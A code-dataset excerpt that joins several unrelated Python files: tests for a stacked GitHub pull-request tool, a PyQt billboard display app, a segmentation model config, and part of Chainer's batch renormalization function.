* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG1A Update A on "Commit 1"
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG1A (gh/ezyang/1/head) Update A on "Commit 1"
| * rMRG2 (gh/ezyang/2/head) Commit 2
|/
* rMRG1 (gh/ezyang/2/base) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Restack the top commit")
self.sh.git("cherry-pick", self.lookupRev("rCOM2"))
self.sh.test_tick()
self.gh('Update B')
self.substituteRev("HEAD", "rCOM2A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG1A Update A on "Commit 1"
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
* rMRG2A Update B on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Update B on "Commit 2"
|\\
| * rMRG1A (gh/ezyang/2/base, gh/ezyang/1/head) Update A on "Commit 1"
* | rMRG2 Commit 2
|/
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_all(self) -> None:
print("####################")
print("### test_amend_all")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the commits")
self.sh.git("checkout", "HEAD~")
with self.sh.open("file1.txt", "w") as f:
f.write("ABBA")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.substituteRev("HEAD", "rCOM1A")
self.sh.test_tick()
self.sh.git("cherry-pick", self.lookupRev("rCOM2"))
self.substituteRev("HEAD", "rCOM2A")
self.sh.test_tick()
self.gh('Update A')
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG1A Update A on "Commit 1"
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
* rMRG2A Update A on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Update A on "Commit 2"
|\\
| * rMRG1A (gh/ezyang/2/base, gh/ezyang/1/head) Update A on "Commit 1"
* | rMRG2 Commit 2
|/
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_rebase(self) -> None:
print("####################")
print("### test_rebase")
self.sh.git("checkout", "-b", "feature")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Push master forward")
self.sh.git("checkout", "master")
with self.sh.open("master.txt", "w") as f:
f.write("M")
self.sh.git("add", "master.txt")
self.sh.git("commit", "-m", "Master commit 1\n\nA commit with a M")
self.substituteRev("HEAD", "rINI2")
self.sh.test_tick()
self.sh.git("push", "origin", "master")
print("###")
print("### Rebase the commits")
self.sh.git("checkout", "feature")
self.sh.git("rebase", "origin/master")
self.substituteRev("HEAD", "rCOM2A")
self.substituteRev("HEAD~", "rCOM1A")
self.gh('Rebase')
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG1A Rebase on "Commit 1"
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
* rMRG2A Rebase on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Rebase on "Commit 2"
|\\
| * rMRG1A (gh/ezyang/2/base, gh/ezyang/1/head) Rebase on "Commit 1"
| |\\
| | * rINI2 (HEAD -> master, gh/ezyang/1/base) Master commit 1
* | | rMRG2 Commit 2
|/ /
* | rMRG1 Commit 1
|/
* rINI0 Initial commit
''')
# ------------------------------------------------------------------------- #
def test_cherry_pick(self) -> None:
print("####################")
print("### test_cherry_pick")
self.sh.git("checkout", "-b", "feature")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Push master forward")
self.sh.git("checkout", "master")
with self.sh.open("master.txt", "w") as f:
f.write("M")
self.sh.git("add", "master.txt")
self.sh.git("commit", "-m", "Master commit 1\n\nA commit with a M")
self.substituteRev("HEAD", "rINI2")
self.sh.test_tick()
self.sh.git("push", "origin", "master")
print("###")
print("### Cherry-pick the second commit")
self.sh.git("cherry-pick", "feature")
self.substituteRev("HEAD", "rCOM2A")
self.gh('Cherry pick')
self.substituteRev("origin/gh/ezyang/2/base", "rINI2A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
A commit with a B
* rMRG2 Commit 2
* rMRG2A Cherry pick on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Cherry pick on "Commit 2"
|\\
| * rINI2A (gh/ezyang/2/base) Update base for Cherry pick on "Commit 2"
| |\\
| | * rINI2 (HEAD -> master) Master commit 1
* | | rMRG2 Commit 2
|/ /
* | rMRG1 (gh/ezyang/1/head) Commit 1
|/
* rINI0 (gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_no_clobber(self) -> None:
# Check that we don't clobber changes to PR description or title
print("####################")
print("### test_no_clobber")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nOriginal message")
self.sh.test_tick()
self.gh('Initial 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the PR")
self.github.patch("repos/pytorch/pytorch/pulls/500",
body="""\
Stack:
* **#500 Commit 1**
Directly updated message body""",
title="Directly updated title")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Directly updated message body
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Submit an update")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "--amend")
self.sh.test_tick()
self.gh('Update 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Directly updated title**
Directly updated message body
* rMRG1 Commit 1
* rMRG2 Update 1 on "Directly updated title"
Repository state:
* rMRG2 (gh/ezyang/1/head) Update 1 on "Directly updated title"
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_no_clobber_carriage_returns(self) -> None:
# In some situations, GitHub will replace your newlines with
# \r\n. Check we handle this correctly.
print("####################")
print("### test_no_clobber_carriage_returns")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nOriginal message")
self.sh.test_tick()
self.gh('Initial 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the PR")
self.github.patch("repos/pytorch/pytorch/pulls/500",
body="""\
Stack:
* **#500 Commit 1**
Directly updated message body""".replace('\n', '\r\n'),
title="Directly updated title")
print("###")
print("### Submit a new commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 2")
self.sh.test_tick()
self.gh('Initial 2')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Directly updated title**
Directly updated message body
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Directly updated title
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_update_fields(self) -> None:
# Check that we do clobber fields when explicitly asked
print("####################")
print("### test_update_fields")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nOriginal message")
self.sh.test_tick()
self.gh('Initial 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the PR")
self.github.patch("repos/pytorch/pytorch/pulls/500",
body="Directly updated message body",
title="Directly updated title")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Directly updated message body
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Force update fields")
self.gh('Update 1', update_fields=True)
self.sh.test_tick()
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_update_fields_preserve_differential_revision(self) -> None:
# Check that Differential Revision is preserved
logging.info("### test_update_fields_preserve_differential_revision")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nOriginal message")
self.sh.test_tick()
self.gh('Initial 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
logging.info("### Amend the PR")
body = """\n
Directly updated message body
Differential Revision: [D14778507](https://our.internmc.facebook.com/intern/diff/D14778507)
"""
self.github.patch("repos/pytorch/pytorch/pulls/500",
body=body,
title="Directly updated title")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Directly updated message body
Differential Revision: [D14778507](https://our.internmc.facebook.com/intern/diff/D14778507)
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
logging.info("### Force update fields")
self.gh('Update 1', update_fields=True)
self.sh.test_tick()
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
Differential Revision: [D14778507](https://our.internmc.facebook.com/intern/diff/D14778507)
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_remove_bottom_commit(self) -> None:
# This is to test a bug where we decided not to update base,
# but this was wrong
self.sh.git("checkout", "-b", "feature")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Delete first commit")
self.sh.git("checkout", "master")
print("###")
print("### Cherry-pick the second commit")
self.sh.git("cherry-pick", "feature")
self.substituteRev("HEAD", "rCOM2A")
self.gh('Cherry pick')
self.substituteRev("origin/gh/ezyang/2/base", "rINI2A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
A commit with a B
* rMRG2 Commit 2
* rMRG2A Cherry pick on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Cherry pick on "Commit 2"
|\\
| * rINI2A (gh/ezyang/2/base) Update base for Cherry pick on "Commit 2"
| |\\
* | | rMRG2 Commit 2
|/ /
* | rMRG1 (gh/ezyang/1/head) Commit 1
|/
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_short(self) -> None:
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
with captured_output() as (out, err):
self.gh('Initial', short=True)
self.assertEqual(out.getvalue(), "https://github.com/pytorch/pytorch/pull/500\n")
# ------------------------------------------------------------------------- #
"""
def test_land_ff(self) -> None:
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
self.gh('Initial')
self.substituteRev("HEAD", "rCOM1")
self.gh_land()
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
This is my first commit
* 3f14b96 Commit 1
Repository state:
* 3f14b96 (gh/ezyang/1/head) Commit 1
* rINI0 (gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_land_non_ff(self) -> None:
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
self.gh('Initial')
self.substituteRev("HEAD", "rCOM1")
self.sh.git("reset", "--hard", "origin/master")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Upstream commit")
self.substituteRev("HEAD", "rUP1")
self.sh.git("push")
self.sh.git("checkout", "gh/ezyang/1/orig")
self.gh_land()
self.substituteRev("origin/master", "rUP2")
self.assertExpected(self.upstream_sh.git("log", "--oneline", "master"), '''\
rUP2 Commit 1
rUP1 Upstream commit
rINI0 Initial commit''')
"""
# ------------------------------------------------------------------------- #
def test_unlink(self) -> None:
print("###")
print("### First commit")
self.writeFileAndAdd("file1.txt", "A")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.writeFileAndAdd("file2.txt", "B")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an B")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
# Unlink
self.gh_unlink()
self.gh('Initial 2')
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 1
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 1 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 1**
* #500 Commit 1
A commit with an B
* db38c32 Commit 1
#502 Commit 1 (gh/ezyang/3/head -> gh/ezyang/3/base)
Stack:
* #503 Commit 1
* **#502 Commit 1**
A commit with an A
* rMRG1 Commit 1
#503 Commit 1 (gh/ezyang/4/head -> gh/ezyang/4/base)
Stack:
* **#503 Commit 1**
* #502 Commit 1
A commit with an B
* db38c32 Commit 1
Repository state:
* db38c32 (gh/ezyang/4/head, gh/ezyang/2/head) Commit 1
* rMRG1 (gh/ezyang/4/base, gh/ezyang/3/head, gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/3/base, gh/ezyang/1/base) Initial commit
''')
# def load_tests(loader, tests, ignore):
# tests.addTests(doctest.DocTestSuite(gh))
# return tests
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format='%(message)s')
unittest.main()
| 27.607185 | 139 | 0.545022 |
d3a5607495bef8529749795e700e48b7bb9b6cd9
| 1,920 |
py
|
Python
|
billboard/app.py
|
setrofim/billboard
|
acb7d3e0a26c1c42def85a96ec33cd895c8a7ead
|
[
"BSD-3-Clause"
] | 1 |
2018-08-01T13:03:22.000Z
|
2018-08-01T13:03:22.000Z
|
billboard/app.py
|
setrofim/billboard
|
acb7d3e0a26c1c42def85a96ec33cd895c8a7ead
|
[
"BSD-3-Clause"
] | 2 |
2016-04-21T14:11:28.000Z
|
2018-06-28T15:05:59.000Z
|
billboard/app.py
|
setrofim/billboard
|
acb7d3e0a26c1c42def85a96ec33cd895c8a7ead
|
[
"BSD-3-Clause"
] | 2 |
2017-02-26T17:30:11.000Z
|
2018-06-29T15:35:14.000Z
|
import os
import sys
import argparse
import signal
import tempfile
import logging
from PyQt4.QtGui import QApplication
from billboard.billboard import Billboard
from billboard.display import BillboardDisplay
from billboard.server import Server
from billboard.sources.reddit import RedditSource
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--period', type=int, default=60*15,
help='''
Period for switching billboard display in seconds.
Defaults to 15 minutes.
''')
parser.add_argument('-d', '--working-directory',
help='''
Working directory used by billboard. If not specified,
a temporary directory will be created.
''')
parser.add_argument('-P', '--port', type=int, default=5555,
help='''
Port to be used by the server.
''')
parser.add_argument('--debug', action='store_true')
return parser.parse_args(sys.argv[1:])
def main():
signal.signal(signal.SIGINT, signal.SIG_DFL)
args = parse_args()
level = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(format='%(asctime)s %(levelname)-8s %(name)s: %(message)s', level=level)
app = QApplication(sys.argv)
workdir = os.path.abspath(args.working_directory or tempfile.mktemp())
if not os.path.isdir(workdir):
logging.debug('Creating {}'.format(workdir))
os.makedirs(workdir)
server = Server(workdir, args.port)
display = BillboardDisplay(workdir=workdir)
sources = [RedditSource()]
billboard = Billboard(display, sources, args.period)
billboard.start()
display.showFullScreen()
server.start()
app.exec_()
if __name__ == '__main__':
main()
| 29.538462 | 96 | 0.614063 |
e45c50cb815c85c6891c49a5bb267e0b6f87628d
| 352 |
py
|
Python
|
configs/deeplabv3/deeplabv3_r50a-d8_512x512_20k_sn6_sar_pro.py
|
yoyoyoohh/spacenet6
|
57829afb6a642d96c30c42434929080b6d927fb4
|
[
"Apache-2.0"
] | null | null | null |
configs/deeplabv3/deeplabv3_r50a-d8_512x512_20k_sn6_sar_pro.py
|
yoyoyoohh/spacenet6
|
57829afb6a642d96c30c42434929080b6d927fb4
|
[
"Apache-2.0"
] | null | null | null |
configs/deeplabv3/deeplabv3_r50a-d8_512x512_20k_sn6_sar_pro.py
|
yoyoyoohh/spacenet6
|
57829afb6a642d96c30c42434929080b6d927fb4
|
[
"Apache-2.0"
] | null | null | null |
'''
Author: Shuailin Chen
Created Date: 2021-09-14
Last Modified: 2021-09-25
content:
'''
_base_ = [
'../_base_/models/deeplabv3_r50a-d8.py',
'../_base_/datasets/sn6_sar_pro.py', '../_base_/default_runtime.py',
'../_base_/schedules/schedule_20k.py'
]
model = dict(
decode_head=dict(num_classes=2), auxiliary_head=dict(num_classes=2))
| 25.142857 | 72 | 0.696023 |
0e179db186b5c9e67e4de1145e642ef8f6563b9c
| 8,632 |
py
|
Python
|
chainer/functions/normalization/batch_renormalization.py
|
takeratta/chainer
|
02686e98cd6dc8f20979a1f3a79130f076cbfc6c
|
[
"MIT"
] | 2 |
2018-02-05T07:25:48.000Z
|
2018-08-28T20:29:45.000Z
|
chainer/functions/normalization/batch_renormalization.py
|
takeratta/chainer
|
02686e98cd6dc8f20979a1f3a79130f076cbfc6c
|
[
"MIT"
] | null | null | null |
chainer/functions/normalization/batch_renormalization.py
|
takeratta/chainer
|
02686e98cd6dc8f20979a1f3a79130f076cbfc6c
|
[
"MIT"
] | 1 |
2018-08-23T01:34:57.000Z
|
2018-08-23T01:34:57.000Z
|
import numpy
from chainer import configuration
from chainer import cuda
from chainer import function
from chainer.utils import type_check
def _as4darray(arr):
if arr.ndim == 0:
return arr.reshape(1, 1, 1, 1)
elif arr.ndim == 4:
return arr
else:
return arr.reshape(arr.shape[0], -1, 1, 1)
def _xhat(x, mean, std, expander):
x_mu = x - mean[expander]
x_mu /= std[expander]
return x_mu
class BatchRenormalizationFunction(function.Function):
def __init__(self, eps=2e-5, mean=None, var=None, decay=0.9,
rmax=1, dmax=0, freeze_running_statistics=False):
self.running_mean = mean
self.running_var = var
self.rmax = rmax
self.dmax = dmax
self.r = None
self.d = None
self.freeze_running_statistics = freeze_running_statistics
self.eps = eps
self.mean_cache = None
self.decay = decay
def check_type_forward(self, in_types):
n_in = type_check.eval(in_types.size())
if n_in != 3 and n_in != 5:
raise type_check.InvalidType(
'%s or %s' % (in_types.size() == 3, in_types.size() == 5),
'%s == %s' % (in_types.size(), n_in))
x_type, gamma_type, beta_type = in_types[:3]
M = type_check.eval(gamma_type.ndim)
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim >= gamma_type.ndim + 1,
x_type.shape[1:1 + M] == gamma_type.shape,
# TODO(tkerola): Check shape
gamma_type.dtype == x_type.dtype,
beta_type.dtype == x_type.dtype,
gamma_type.shape == beta_type.shape,
)
if len(in_types) == 5:
mean_type, var_type = in_types[3:]
type_check.expect(
mean_type.dtype == x_type.dtype,
mean_type.shape == gamma_type.shape,
var_type.dtype == x_type.dtype,
var_type.shape == gamma_type.shape,
)
def forward(self, inputs):
xp = cuda.get_array_module(*inputs)
x, gamma, beta = inputs[:3]
# Note: If length of inputs is not 5, we must be in train mode.
if len(inputs) != 5:
assert configuration.config.train
if configuration.config.train:
if self.running_mean is None:
self.running_mean = xp.zeros_like(gamma)
self.running_var = xp.zeros_like(gamma)
else:
self.running_mean = xp.array(self.running_mean)
self.running_var = xp.array(self.running_var)
elif len(inputs) == 5:
fixed_mean = inputs[3]
fixed_var = inputs[4]
head_ndim = gamma.ndim + 1
expander = (None, Ellipsis) + (None,) * (x.ndim - head_ndim)
# NOTE(tommi): cuDNN is not used since it does not support
# batch renormalization
if configuration.config.train:
axis = (0,) + tuple(range(head_ndim, x.ndim))
mean = x.mean(axis=axis)
var = x.var(axis=axis) + self.eps
else:
mean = fixed_mean
var = fixed_var + self.eps
self.std = xp.sqrt(var, dtype=var.dtype)
if not self.freeze_running_statistics or self.r is None:
if configuration.config.train:
running_sigma = xp.sqrt(self.running_var + self.eps,
dtype=self.running_mean.dtype)
self.r = xp.clip(self.std / running_sigma,
1.0 / self.rmax, self.rmax)
self.d = xp.clip((mean - self.running_mean) / running_sigma,
-self.dmax, self.dmax)
# Update running statistics:
m = x.size // gamma[expander].size
self.running_mean *= self.decay
adjust = m / max(m - 1., 1.) # unbiased estimation
temp_ar = xp.array(mean)
temp_ar *= (1 - self.decay)
self.running_mean += temp_ar
del temp_ar
self.running_var *= self.decay
temp_ar = xp.array(var)
